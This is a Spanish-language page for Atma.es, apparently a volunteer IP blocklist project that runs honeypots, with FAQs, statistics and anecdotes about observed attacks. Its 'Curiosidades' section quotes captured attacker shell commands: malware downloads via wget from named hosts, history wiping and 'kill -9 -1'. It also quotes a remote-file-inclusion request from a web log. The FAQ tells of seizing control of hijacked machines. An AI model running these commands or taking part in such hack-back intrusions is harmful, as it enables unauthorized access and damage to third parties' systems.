URGENTE: Estamos detectando una gran cantidad de ataques -principalmente por Telnet- procedentes de todo tipo de dispositivos, como enrutadores domésticos, "media centers", TIVOs, discos multimedia de red, decodificadores de TV/DVB/VOD/TDT , etc. Se trata de un nuevo "malware" todavía desconocido al que su autor original denominó "Aidra". Lo más problable es que tus antivirus, cortafuegos, etc. no lo detectarán. Trata de mantener desconectados tus dispositivos de red tanto como sea posible, evita -más que nunca- contraseñas en blanco, débiles o por omisión y mantén cerrados todos los puertos que no necesites. Leer más. Atma.es, 26 enero 2012.

 

Presentación 

El objetivo de Atma.es es identificar direcciones de red maliciosas en internet tales como:

• Ataques que permiten espiar o incluso tomar el control remoto de ordenadores ajenos por medios como la terminal remota de Microsoft, SSH, Telnet, o servidores de escritorio remoto.

• Riesgos relacionados con el correo electrónico, como el rastreo y validación de direcciones de correo para enviar correo basura, el robo de cuentas, etc.

• Sitios que tratan de infectar a sus visitantes con virus, troyanos, programas espía, etc. o bien son usados por éstos para comunicarse con sus creadores cuando ya se ha producido la infección.

• Peligros para servidores: explotación de vulnerabilidades, identificaciones falsas, ataques para tomar su control, etc.

• Escaneos en busca de puertas traseras por donde poder acceder a ordenadores vulnerables a través de la identificación del sistema operativo y su versión, programas y servicios que se están ejecutando, etc.

• Distribución de virus, gusanos, etc. a través de redes P2P, o simplemente de archivos o tráfico corrupto.

La lista con las direcciones identificadas se actualiza periódicamente y se ofrece en formato PeerGuardian, válido para cualquiera de los programas de bloqueo más habituales. Tan sólo tendrá que indicarle una de las siguientes direcciones para su descarga:

• http://www.atma.es/atma.p2p (*)
• http://galinux.myftp.org/atma.p2p (*)
• http://list.iblocklist.com/?list=tzmtqbbsgbtfxainogvm   (Comprimido con Gz)
• http://list.iblocklist.com/lists/atma/atma   (Comprimido con Gz)

(*) La descarga podría estar prohibida para IPs de ciertos países, que estén en la lista o próximas a ellas)

Un agradecimiento especial a quienes últimamente nos han ayudado de una u otra manera: "thajsta", "frisco.chico", "imvgilante2000", "yoshigoto95", "borjanogueiras", "rautamiekka", "gate.wizard", "meistersinger", "fakhir" y "marc.kuehrer".

Documentación 

Guias de uso 

  Peerguardian 2 para Windows       IPlist/IPblock 0.26 para Linux

Peerblock: añade una lista nueva y pega http://list.iblocklist.com/lists/atma/atma

 

Preguntas y respuestas

¿Cómo puedo usar la lista blacklist/atma?

La mayoría de programas de bloqueo vienen con unas pocas listas preconfiguradas a elegir entre las que no suele estar blacklist.p2p/atma.p2p. La forma de añadirla varía en cada uno pero suele ser una tarea bastante sencilla (vea arriba "Guías de uso"). Si lo deseas, puedes ver cómo hacerlo con Peerguardian e IPlist/IPblock en la sección "guías de uso". Nuestra lista se publica en formato Peerguardian 1, que es compatible con la práctica totalidad de los programas de bloqueo existentes. Si aún no lo has hecho, puedes elegir uno en la sección de descargas.

En cuanto a términos de uso, la lista es libre y gratuíta para cualquier fin no lucrativo. Si no es el caso, consúltanos.

¿Porqué debería de usar esta lista si el programa que yo uso ya trae varias?

Sobre todo porque algunas direcciones de Internet que recogemos en ella frecuentemente no aparecen en otras listas o lo hacen pasado un tiempo, por varios motivos:

1. Identificamos las direcciones peligrosas con herramientas propias no publicadas en ningún sítio y que no están basadas en ninguna otra. Los atacantes no pueden esquivarlas porque no saben cómo funcionan (en el caso de que supiesen de su existenca). Además, tampoco pueden saber dónde les estamos esperando porque usamos direcciones IP dinámicas de distintos proveedores, es decir, que cambian periódicamente. Tras un ataque, cuando vean al poco tiempo que aparecen en nuestra lista, nosotros ya habremos cambiado de dirección IP y resultará inútil que avisen a sus cómplices.
   
2. Es elaborada por hispanohablantes. Al menos en temas informáticos, la lengua inglesa es imperante. Por ello, los atacantes suelen saber Inglés pero resulta mucho menos probable que entiendan el Español/Castellano, por lo que en muchas ocasiones no llegan jamás a saber que han caído en una trampa: tan simple como que no comprenden gran parte de lo que ven en sus monitores.
   
3. EL método habitual de detección de ataques es la vigilancia más o menos pasiva de lo que llega a nuestra red local, pero nosotros no esperamos sentados a que nos ataquen por casualidad. Por el contrario, emitimos una gran cantidad de señales falsas aparentando ser una red vulnerable de una empresa media, consiguiendo atraer a un gran número de atacantes en muy poco tiempo. Incluso cuando hay expectativas de identificar a toda una banda, frecuentemente nos infiltramos en sus grupos haciéndonos pasar por "hackers/crackers" (existe una polémica bastante absurda sobre el significado exacto de estos términos).

¿Debería de usar sólo esta lista o combinada con otras?

Por una parte, cuantas más listas uses, más tiempo de cálculo necesitará tu programa de bloqueo. Si tu ordenador ya tiene algunos años, es un aspecto a considerar. Por otro lado, a pesar de que incluímos direcciones peligrosas recogidas por terceros en otras listas, es casi imposible que estén todas las que debieran. Desde luego, siempre resultará más seguro usar más de una fuente (otras se actualizan con mayor frecuencia o son más específicas), pero Atma es una lista multipropósito que puede resultar perfecta para la mayor parte de usuarios domésticos o profesionales. Para darte una idea del tipo de amenazas que incluímos en nuestras lista, écha un vistazo a su composición a finales de marzo de 2010:

Amenaza:	Etiqueta en la lista:	IPs/rangos:
Publicidad no deseada por correo, en foros, etc. Propagación de virus, troyanos, gusanos, etc. Peligro desconocido o sin clasificar Toma de control por SSH Peligroso para servidores de correo electrónico Propagación de virus, troyanos, etc. en redes P2P Tráfico corrupto en redes P2P Varias amenazas de distinto tipo Peligroso para servidores SQL Escaneo de puertos Buscador de "proxies" abiertos Peligroso para servidores HTML/PHP/SQL Toma de control por Telnet Toma de control por consola remota Microsoft Peligroso para servidores FTP Tráfico malicioso en redes P2P Toma de control por escritorio remoto Otros Total de IPs individuales: 88125	Spammer Malware Unspecified Threat SSH Attack SMTP Port 25 Attack P2P Malware P2P Corrupted Packets Several Threats Threat For SQL Servers Port Scan Attack Proxy Seeker Threat For Web Servers Telnet Attack MS-Terminal Attack FTP Attack P2P Unrequested Responses VNC Attack Otras descripciones	20667 14846 10979 5348 4183 2704 2388 1577 688 554 476 471 234 191 173 112 68 38

Ten presente que no incluímos IPs:

• Sobre sexo, publicidad, rastreadores de usuarios P2P, etc. a menos que explícitamente contengan algún tipo de amenaza.
• Compartidas por un alto número de dominios (normalmente miles), a pesar de que alguno resulte peligroso.
• Algunas IPs/rangos reservados para redes locales, pruebas, etc. de las enunciadas en http://tools.ietf.org/html/rfc3330
• Sitios de compañías u organizaciones de especial relevancia, tales como Google, Microsoft, Rapidshare, Yahoo y otras.
  (Sin embargo recuerda que incluso una sencilla búsqueda en Google, por ejemplo, podría llevarte hacia sitios maliciosos)

Si quieres bloquear algo de lo anterior, definitivamente necesitarás listas adicionales.

¿Cómo es la política de borrado de la lista?

Todas las IPs son eliminadas de la lista al cabo de un periodo de tiempo que va desde un mínimo de dos meses (amenazas menores como por ej. "Pingers") hasta un máximo de 5 (los más peligrosos y con abultados historiales a sus espaldas). Por supuesto, los falsos positivos se eliminan en cuanto tenemos conocimiento de ellos. Ésta era la antigüedad de cada entrada a finales de junio de 2010:

IPs/rangos añadidos en:	IPs/rangos:
El mes actual (junio) Hace 1-2 meses(mayo) Hace 2-3 meses(abril) Hace 3-4 meses(marzo)	40261 21420 21101 213

¿Seguiré necesitando antivirus, cortafuegos, etc.?

Sí. Usando nuestra lista con su programa de bloqueo, solamente evita el contacto por Internet con gran parte de los equipos peligrosos que acechan en la red... ¡pero podría usted dar con uno nuevo o no identificado!. Además, hay muchas formas de infectar un ordenador que no hacen uso de la red, como puede ser con memorias USB, archivos en CDs, etc.

Ya estoy usando la lista Atma pero sigo recibiendo correo basura.

Es cierto que una gran parte de la lista la constituyen direcciones IP de "spammers" y ello es por un motivo: quien envía correos basura es muy probable que represente algún otro tipo de amenaza, especialmente para quienes administren servidores, foros, blogs, etc. Por otra parte, en la lista jamás incluiremos servidores de correo de los más importantes proveedores, como puedan ser Gmail, Hotmail, Yahoo, etc. Desgraciadamente, gran parte del correo basura que te llegue lo hará desde cuentas de esas compañías. Si no estás satisfecho con sus propios filtros anti-basura y usas algún programa de gestión de correo, puedes probar a instalar algún filtro en tu equipo.

¿Es una lista muy usada?

Suponemos que en absoluto hasta febrero de 2010, pero sólo teníamos datos fehacientes de las descargas desde uno de los alojamientos. Como dato orientativo, desde ese sitio se había descargado 5000 veces en enero de 2010. Sin embargo, desde entonces ha sido incluída en el que tal vez sea el sitio más importante sobre listas de bloqueo: iblocklist.com

¿Lleváis a cabo ataques contra las direcciones maliciosas?

No, no lo hacemos. Sin embargo, en contadas ocasiones hemos tomado el control de algún equipo secuestrado por varias razones:
* Ser uno de los más agresivos del momento.
* Alto riesgo de alertar a los "malos" antes de al administrador legítimo.
* Buenas expectativas de obtener mucha información sobre los secuestradores.

Dichos equipos han sido: uno de Truetel en Taiwan (2009), otro de una patrulla de bomberos de Tasmania (2010), el servidor de una tienda "online" en Polonia (2011) y varios servidores corporativos (2011) en España (todavía activos, vea porqué y más información en esta sección).

Ahora mismo (octubre 2011), nos hemos fijado en las tristemente conocidas IPs chinas 58.218.199.227, 58.218.199.147 y 58.218.199.250 (aunque todo el subrango ha sido activo en el pasado e incluso otras IPs como 222.208.183.218 parecen tener relación) ; es inútil quejarse ni advertir a nadie, ya que no estamos hablando de equipos secuestrados. No esperamos verlos desconectados, pero, en caso de éxito, no volverán a ser de nuevo tan activos como lo han sido hasta el presente septiembre. Si deseas colaborar, escríbenos un correo electrónico.

También durante noviembre de 2011 hemos tenido muy entretenidos :) a los de MediaDefender 208.86.198.xxx hasta el día 22.

¿Qué significan las descripciones que veo en las alertas de mi programa de bloqueo?

Recuerde que el hecho de que un atacante tenga un objetivo determinado, no significa que vaya a renunciar otro si se le presenta la ocasión. Tampoco un ordenador que corra con un sistema operativo queda por ello protegido de todo tipo de ataques no específicos contra ese en concreto. Por ejemplo, hay formas de ejecutar servicios propios de Unix/Linux tales como SSH en equipos con Windows, y viceversa; incluso hay riesgos universales como por ejemplo, tener funcionando un servidor FTP con una contraseña débil. Dicho eso, las alertas responden a tres tipos de objetivos:

• Ataques específicos a servidores
• Peligros para usuarios de programas de intercambio
• Amenazas para todo tipo de usuarios y equipos

Según su gravedad, los escaneos sólo tratan de obtener algún tipo de información (aunque pueden ser el primer paso para un ataque más serio). En el otro extremo, identificamos con "several attacks" a aquellas IPs de las que hemos detectado varios tipos de ataques, y que por ello resultan las más peligrosas.

Curiosidades

 Ejemplos de ataques detectados por SSH:

Obteniendo información w uptime id ls -a uname -a cat /proc/cpuifno ps x wget curl -O Ataque tras una conexión anterior rm -rf .bash_history history -c w ps x ls -a Tratando de escapar de la trampa bash sh kill -9 -1 reboot exit

Enviando malware al equipo atacado uname -a passwd wget http://nasa.undernet.nm.ru/udp.tgz tar zxvf udp.tgz Otros envíos vinieron de dragutrau.clan.su/Trade/army.tar.gz freewebtown.com/hotzu/py/ryo.tar prigat.ucoz.com/mangalia.tgz No quieren que sepamos lo que hacen unset HISTFILE HISTSAVE HISTLOG WATCH HISTFILE=/dev/null Tratando de ejecutar malware cd /dev/shm su DoS chapucero contra Microsoft o test de velocidad? wget http://download.microsoft.com/download/win ... /W2Ksp3.exe

 Algunas detecciones llamativas:

• ¿Eran los Anonymous españoles detenidos en junio quienes atacaron un servidor nuestro en mayo de 2011? (actualizado en septiembre). Ya que las noticias oficiales no aclaran mucho, esperamos que alguien del grupo nos confirme o desmienta su implicación, así como los motivos del ataque. Versión en PDF.
  

  Extracto del aviso enviado el 14 de mayo al grupo de delitos telemáticos de la Guardia Civil: Esta semana se recibió un ataque de fuerza bruta simultánea e insistentemente (puerto 3389, consola remota) desde 25 IPs españolas. Por el momento desconozco si la elección ha sido casual o bien atacaron intencionadamente a modo de represalia por alguna dirección IP que pudiésemos tener señalada como peligrosa. De todas formas, esta posibilidad me parece algo absurda, porque habrían de saber que las IPs atacantes serían registradas y publicadas. He preparado un documento explicando lo ocurrido que publicaremos en breve en atma.es pero antes de hacerlo público tal vez ustedes estén interesados en el tema y, para no alertar a los culpables, se lo hago saber con antelación. Algunos datos que no he incluído en el documento: * No es una "bot-net" gestionada desde el extranjero. A pesar de que alguno de los equipos parece estar infectado con virus, ello no tiene relación con el ataque, que es más bien "casero", como de un grupo de gente que se ha puesto de acuerdo para ello. * Puedo confirmar que al menos dos de las IPs son routers wifi a los que los atacantes se conectan sin conocimiento de sus dueños, que parecen ser pequeñas empresas. Deafortunadamente no he sido capaz de averiguar a quien pertenecen, así que seguirán indefinidamente sin saber que sus conexiones se están usando con fines delictivos. * Extrañamente, sólo parecen estar interesados en ataques de consola remota Windows, probando siempre combinaciones con el usuario "Administrador". (sigue)

• Escaneos por Telnet desde 128.59.14.100 -128.59.14.116 (Universidad de Columbia), que resultaron ser un proyecto de investigación. Sin embargo, tras la última visita en septiembre de 2011, hemos encontrado algunas cosas que nos desagradan:
  • No especifican cuando terminará el proyecto, siempre está en estado "ongoing". Llamar a puertas ajenas sin haber sido invitado es algo que debería durar lo menos posible. Además, y dado que ahora escanean puertos SSH, cabe preguntarse qué vendrá después.
  • Están beneficiándose económica y profesionalmente del proyecto: una empresa, varias patentes, patrocinio de organismos de defensa de los EEUU, conferencias, publicaciones... por consiguiente, la información que hacen pública es escasa y de nula utilidad. Si nadie más que ellos va a beneficiarse del proyecto, no vemos gran diferencia con otros muchos escaneos diarios.
• Archivos falsos en la red Gnutella desde 65.50.67.197 (www.markmonitor.com) en marzo de 2010... ¡al buscar archivos de dominio público!
• Escaneo de puertos el 21 de diciembre de 2009 desde la 69.48.241.84 (www.trustedsource.org perteneciente a McAfee Antivirus).
• Archivos falsos en la red Gnutella desde la IP 65.55.102.24 (Microsoft Corporation) el 21 de octubre y 1 de noviembre de 2009.
• Escaneo de puertos en septiembre y octubre de 2009 desde la IP 208.43.71.139 (Avast Antivirus).

 Programas de bloqueo descargando blacklist/atma en la primera semana de Diciembre de 2009:

Descargas 760 253 112 43 14 7 4 4 2 1 Totales 916 253 14 11

Programa/Versión PeerBlock/1.0.0.181 PeerGuardian/2.0 PeerBlock/1.0.0.202 PeerBlock/1.0.0.223 BlockControl/1.6.9 PeerBlock/0.9.2.86 IPblock/0.18 IPblock/0.27 IPblock/0.26 PeerBlock/1.0.0.187 Programa PeerBlock PeerGuardian BlockControl IPblock

 En septiembre de 2009 intentaron averiguar la contraseña de 10374 nombres de usuario distintos. Los más atacados fueron:

9850 1034 690 431 264 224 208 206 195 190

root admin test oracle user guest robert mysql michael paul

190 177 176 176 168 166 162 154 152 148

info postgres amanda adam sales martin backup student ftpuser suporte

132 130 130 130 126 126 124 120 115 114

testing nagios eric david web tester john richard sarah sam

114 110 107 106 104 102 101 100 100 100

patrick bruce matt mark cyrus teste marc webmaster mail download

    Conclusión: crear cuentas de usuarios que no estén en inglés dificulta en gran medida los ataques. Hispanohablantes eviten "david".

 Los chicos malos no descansan nunca:

2009, noche del 24 al 25 de diciembre. Mientras buena parte del mundo celebra en familia el aniversario del nacimiento de Jesucristo, los atacantes aprovechan la ocasión. En pocas horas se detectaron tantos ataques como en varios días cualquiera. El más llamativo fue un ataque de diccionario por SSH recibido desde 209.44.120.2 que duró 8 horas durante las que probó 20.859 combinaciones de usuario + contraseña.

7 de julio de 2010. Mientras en España y Alemania todo el mundo está pendiente del partido que enfrenta a las selecciones de ambos países para su pase a la final del mundial, en un servidor español se detecta un (aparentemente) exitoso ataque de diccionario por SSH:

Jul 7 19:27:42 [no mostrado] sshd[28641]: Accepted password for [no mostrado] from 76.191.100.182 port 47065 ssh2
Jul 7 20:25:37 [no mostrado] sshd[12823]: Accepted password for [no mostrado] from 121.189.19.126 port 46649 ssh2
Jul 7 21:17:08 [no mostrado] sshd[8048]: Accepted password for [no mostrado] from 79.112.214.99 port 1266 ssh2
Jul 7 23:45:48 [no mostrado] sshd[28775]: Accepted password for [no mostrado] from 221.111.75.119 port 33195 ssh2
Jul 7 23:47:14 [no mostrado] sshd[31450]: Accepted password for [no mostrado] from 221.111.75.119 port 51866 ssh2
Jul 7 23:53:28 [no mostrado] sshd[8496]: Accepted password for [no mostrado] from 188.24.255.242 port 30856 ssh2 

Formas "curiosas" de luchar contra el cibercrimen:

Visita recibida desde www.delitosinformaticos.gov.co (agencia gubernamental colombiana "Grupo Investigativo Delitos Informáticos") :

200.93.147.154 - - [17/Feb/2010:13:57:49 +0200] "GET //poll//booth.php?include_path=http://www.iseulbi.com/id1.txt?? HTTP/1.1" 404 613 www.atma.es "-" "Mozilla/5.0" "-"

Sin comentarios :D

¿Dónde están las trampas para ciber-delincuentes?

De la lectura del informe sobre ciber-delincuencia del FBI (primavera 2011) parece desprenderse que, quienes se dedican a esas "actividades", piensan que en España se sitúa un increíble 69 por ciento de las trampas a evitar ("Honeypots") y además, comparten entre sí las direcciones donde creen que se encuentran. Sobre ésto último no es conveniente desvelar si han acertado o no con las nuestras, pero lo que es seguro es que España no es el país con más trampas de este tipo ni de lejos. Es más: a día de hoy ni siquiera sabemos de la existencia de otras distintas a las nuestras.

Abucheo para un par de sitios de alojamiento de imágenes

En septiembre de 2011 nuestro sitio web sufrió un persistente ataque desde 62.129.242.122, un servidor polaco que por entonces estaba secuestrado por un grupo indonesio. Nos pusimos en contacto con los dueños, estudiamos el virus y supimos que alojaban algunos archivos en sitios de almacenamiento de imágenes. Pedimos su colaboración a iconspedia.com and tinypic.com (un tercer sitio estaba claramente relacionado con los atacantes) y nunca obtuvimos respuesta.

¿Para qué quiere Nokia mi dirección de correo y su contraseña?

Por si no lo sabías: cuando usas el gestor de correo electrónico de Nokia, les estás regalando tu cuenta, según explican en este sitio (en Inglés). En Noviembre de 2011 lo confirmamos con un Nokia X3-02 y una cuenta de gMail:

Colaborar 

• ¿Alguna vez has perdido importantes documentos por culpa de virus, troyanos, gusanos, etc.?
• ¿Has perdido alguna vez un montón de horas tratando de desinfectar o recuperar tu ordenador?
• ¿Desearías que nadie se dedicase a rastrear lo que haces en Internet?
• ¿Sabes que a diario se producen fraudes y robos "on-line" de cuentas bancarias, números de tarjetas, etc.?
• ¿Odias tener que dedicar todos los días un buen rato a limpiar tu bandeja de entrada de correo basura?

Hay muchas formas en las que puedes ayudar a protegernos todos de los culpables:

1-Usando y difundiendo nuestra lista

Puedes ayudarnos y ayudar a otros a protegerse dando a conocer nuestro trabajo enlazándolo desde tu sitio web o blog, recomendándolo a tus contactos, etc. Además, si usas nuestra lista, te agradecemos que nos comuniques si te ha bloqueado el acceso a algún sitio legítimo, si crees que alguno peligroso ha cambiado de IP o cualquier otra cosa que nos ayude a mejorar.

Por otra parte, como el número de descargas va en aumento, previsiblemente tendremos problemas en un futuro próximo. Si dispones de algún alojamiento con capacidad de tráfico excedente y dos megabytes libres, puedes ayudarnos manteniendo una copia de la versión más nueva de la lista. En ese caso infórmanos para incluír tu sitio en la sección "Presentación".

2-Envío de registros ( logs ) de programas que pueden identificar IPs peligrosas

Hemos elaborado algunas herramientas automáticas de búsqueda, selección y clasificación de direcciones IP atacantes a partir de registros generados por distintos programas, por lo que podemos procesar los recibidos es cuestión de segundos sin tan siquiera mirarlos. Si crees que algún registro de tu sistema puede ser de utilidad, escríbenos: seguramente podríamos usar varios de ellos. Por el momento estamos trabajando con los de algunos programas de intercambio P2P, con los de ciertos modelos de enrutadores (routers) y también con los de de sistemas Linux y algún otro programa.

3-Envío suelto de direcciones IP o rangos de IPs.

Si sabes cómo identificarlas en un contexto concreto (correos basura que dirigen a ciertos sitios, ataques a tus servidores, corrupción de archivos en P2P, registros de Linux, etc.) puedes enviarnos aquellas que vayas encontrándote. Hay muchas formas en las que se pueden detectar IPs peligrosas con muy poco esfuerzo durante el trabajo habitual frente al ordenador.

4-Instalación de trampas para atacantes

Conocidas como "Tarros de miel" ( Honey Pots ), hacen que nuestro ordenador o red local parezcan lo que no son desde el exterior, simulando otros sistemas operativos, servicios o programas inexistentes, falsas "puertas traseras" abiertas, etc. Pueden llegar a ser enormemente complicadas, pero las más simples son muy fáciles de instalar y efectivas en la mayoría de los casos. Si te decides por esta opción, aquí estaremos para asesorarte en el proceso.

5-Avisos de falsos positivos, revisión de IPs o rangos identificados por otros miembros, etc.

Todos nos podemos equivocar e incluír en la lista a direcciones que no son peligrosas; además es necesario eliminar periodicamente a los que ya no lo sean, atender a solicitudes de exclusión, etc. Es bienvenida toda la ayuda posible en la gestión diaria de la lista pero, sobre todo, que nos hagas saber si nuestra lista está bloqueando a algún sitio legítimo.

Enlaces 

Programas de bloqueo para Microsoft Windows

PeerBlock   PeerGuardian   ProtoWall (no código abierto)   Outpost Pro (no gratuíto)   BeeThink IP blocker (no gratu�to)

Programas de bloqueo para Linux

IPBlock/IPList   MoBlock   PeerGuardian   NfBlock    EisFair-BFB

Programas de bloqueo para Mac-OS

PeerGuardian

Si conoces algún otro, agradecemos que contactes con nosotros para incluírlo en esta lista.

Fuentes externas de direcciones peligrosas

En nuestra lista integramos diariamente las más recientes amenazas detectadas en otros sitios de confianza, a quienes agradecemos que compartan su información:

Amos.TwilightParadox.com    Antispam.Andreotti.nl*    Antivirus.neu.edu.cn    Autoshun.org*    Bizimbal.com    Blackip.ustc.edu.cn    Blocklist.de    Boston.comites-it.org    BotHunter.net    Cert.ntnu.edu.tw    Charles.the-haleys.org    CheekyFreebies.com    Check.Torproject.org    Chriskujawski.com    Clean-mx.de*    Cyber-ta.org    Cs.Rutgers.edu    c64.gotdns.org    Daiwa-comp.co.jp    Danger.rulez.sk    Darrenpopham.com    DnsBL.Abuse.ch*    Doetut.xs4all.nl*    Dougnichols.org    Dynastop.tanaya.net    Dr-data.net    Elfagr.net    Escrow-fraud.com    Elite-proxies.blogspot.com    Elizabeth.czn.cz    EmergingThreats.net    Forum.emule-project.net    Emule-security.net    Esdevagrafica.com.br    EvilDayStar.net    FantasyForeverCreations.com    Files.sabmx.net    ForumPostersUnion.com    FreeHairSecrets.com    Fspamlist.com    Fugitif.DynDns.org    Furniture.co.ua    GabyyHackerTeam    Galf.org    Gamble-Irwin-Group.com    Genendesign.com    Gw.Paraibuna.com.br    Hackedreport.com    Heise.de    Iantighe.com    IPillion.com    Jainvestigation.com    JayScott.co.uk    Juniper.net    Kish-telecom.com    Mail.HogarDeCristo.org.ec    Malc0de.com    MaliciousNetworks.org*    MalwareDomainList.com* MalwarePatrol.net    MalwareURL.com    MarSolucionesFinancieras.com    Meganfath.com    Merlot.com    Mtc.sri.com    MyIPtest.com    MyWot.com/wiki    NeilGunton.com    Nethavoc.net    NetSecDB.de    Noamu.com    Outten.co.uk    Paradoxi.exisoft.nl    Pellegrinilab.org    PrairieHomeOutfitters.com    Progressiverehabmuskego.com    ProjectHoneyPot.org*    ProSouthRealty.com    Puaga.com    Rblhu.net*    RootKitKiller.com    Rynearson.com    Sans.org*    Sblam.com    SB-innovation.de    SecurityNewsPortal.com    Senderbase.org    Semeliker.net    Shinshu.fm    Slyparadox.com    Snortattack.org    Spam-ip.com    sshBL.org*    Stats.denyhosts.net    StopForumSpam.com    Sudosecure.net    Tcc.edu.tw    Thalamus.no-ip.com    TheHackedReport.com    Threatexpert.com    Trustedsource.org    Twitter.com/bannedIPs    Twitter.com/hashza    Twitter.com/HoneyPoint*    Twitter.com/olaf_j*    Uceprotect.net    Unusualdischarge.com    Ustc.edu.cn    VillagePlayers.org    VirtualSupplyNet.com    Vitapatent.com    Websworld.org    Xml.SsdSandBox.net    192.192.205.93   

Note: when you perform a IP/range query, results may include not a generic label but some of the sources labelled with * instead.

Please, note that that we select IPs following our own criteria rather than automatically adding every single one from every single source. That's why you could find IPs that are listed in some of them but missing in the Atma deny list.

Contacto 

Visita nuestro grupo en Google o envíanos un correo electrónico.